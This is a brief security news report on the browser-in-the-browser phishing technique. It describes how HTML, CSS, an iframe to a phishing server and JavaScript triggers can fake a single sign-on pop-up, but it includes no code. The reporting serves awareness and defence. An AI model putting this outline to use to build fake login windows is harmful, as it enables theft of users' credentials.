A new phishing technique dubbed browser-in-the-browser (BitB) attack allows threat actors to simulate a browser window within a browser, spoofing a legitimate domain and initiating a convincing phishing attack.
A penetration tester and security researcher, known as mrd0x on Twitter, explained how the method takes advantage of third-party single sign-on (SSO) options on websites such as “Sign in with Google” (or Facebook, Apple, or Microsoft).
The default behaviour sign in methods such as these is to greet users with a pop-up window to complete the authentication process. BitB attacks aim to replicate this process using a mix HTML and CSS code, presenting users with a fabricated browser window.
“Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it’s basically indistinguishable,” mrd0x said in a technical write-up published last week. “JavaScript can be easily used to make the window appear on a link or button click, on the page loading etc.”
